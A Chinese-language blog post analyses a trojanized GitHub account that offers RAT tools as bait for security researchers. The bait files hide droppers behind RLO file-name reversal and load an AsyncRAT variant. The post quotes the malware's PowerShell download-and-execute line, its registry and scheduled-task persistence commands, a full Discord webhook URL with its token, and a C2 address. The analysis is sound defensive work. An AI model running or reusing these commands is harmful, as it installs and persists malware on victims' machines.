随手分析

随手分析

今天和往常一样我打开github随便浏览了一下新项目

浏览的过程中我看到timwhitez大佬关注了个项目

image-20220603160632672

https://github.com/MerlynXS/Pegasus-Pantheon-HVNC-V2-VNC-Hidden-Browser-Remote-Administration-Rat

是之前网上售卖的一款rat工具然后我就顺便点了一下这个的主页发现他上传了许多了的rat,然后我就关注了一下

image-20220603160800333

顺便随便下载了一个打算看看是个什么钩8玩意,不过下载到本地后发现事情并没有那么简单

为什么这么说呢

image-20220603161000017

好家伙是个马,用了文件名反转来钓鱼.scr。然后我又去看了其他所有项目的发现所有的sln全是.scr。那就来分析一下吧,这里还有个小插曲,过了一会我朋友yansu大佬就过来找我了(大概是看到我github活动关注了这个钓鱼的)事实上也确实是这样

image-20220603161313151

他这个.scr文件是用的捆绑器(Celesty File Binder)进行捆绑的,他把sln文件和exe文件捆绑在了一起然后通过Unicode控制字符RLO来达到反转文件名(当然我感觉这并没什么屌用,都是研究人员还来这套属实是太瞧不起人了)

与sln文件捆绑在一起的是一个.NET文件

image-20220603161947507

不过这个.NET只是一共loader,它内部有一个资源文件

image-20220603162058378

这个文件反转后是一个.NET PE文件,会被loader内存加载执行

image-20220603162251218

dump下来后继续分析(文件被加壳了同时使用了虚拟化)

image-20220603162446014

image-20220603162549760

用de4dot配合手动解混淆后勉强可以看

启动后木马会执行cmd /c timeout 延迟等待N秒用来反沙箱

随后释放Bbxodsfpqzzzzzzzzzzzzzzzz.exe文件到Temp目录执行这个我们先不管

image-20220603164023710

接着创建C:\Users\admin\AppData\Roaming\Ltntuhk目录,并将自身copy过去

image-20220603164450393

设置自启动

image-20220603164528626

image-20220603164706398

请求tg或Discord

image-20220603165409112

image-20220603165436136

image-20220603165449690

他这里配置的是Discord没有用tg

https[:]//discord.com/api/webhooks/930517839058731038/wxqMQna6kAtTNVhmGukOHlrW-WHQkRPOYSzWz2dfuTvv9WOf8jk0mo11B08FfFEQzBLB

中间还有一堆没啥用的操作主要就是创建进程注入进程之类的,里面还用到了一个开源项目https://github.com/snovvcrash/DInjector

最后就是加载资源_._.resources‎解密后注入运行

这个也是一个.net pe这次是rat主体

image-20220603174520849

手动反混淆后经过分析发现是asyncrat变种并没有什么屌用

C2:217.64.31.3:8808,8437

前面释放的那个Bbxodsfpqzzzzzzzzzzzzzzzz.exe文件也是用Celesty File Binder捆绑器生成的里面包含两个.NET PE文件

其中SOFTINCA CRYPT.EXE是执行powershell

1
2
Start-Sleep -Seconds 40;(New-Object SystemNetWebClient)DownloadFile('https://filebin2awsatsigncloud/93i3on1d3fta8ijh/dc_cryptexe',(Join-Path -Path $env:AppData -ChildPath 'WindowsSecurtyexe')); 
Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsSecurtyexe')

V_PROTECTED.EXE有混淆处理后分析

将自身复制到C:\Users\admin\AppData\Roaming\SecurtyService\SecurtyService.exe

创建自启动

1
Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'

创建计划任务

1
cmd /C schtasks /create /tn \SecurtyService /tr "C:\Users\admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

启动regasm

1
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

image-20220603185417071

最后注入资源文件里保存的asyncrat木马,这个和上面的一样没啥可说的

后话

其实这个钓鱼根本没有什么分析的必要技术太低我都懒的看,正好今天放假而且博客也很久没更新了就随便写写吧

好歹你也是钓研究人员你这反转文件名看不起谁呢,用sln文件投毒都比这反转文件名强,免杀也是稀烂

image-20220603190131791

很久没写博客今天写的时候md发现博客坏了,服了又修了半天博客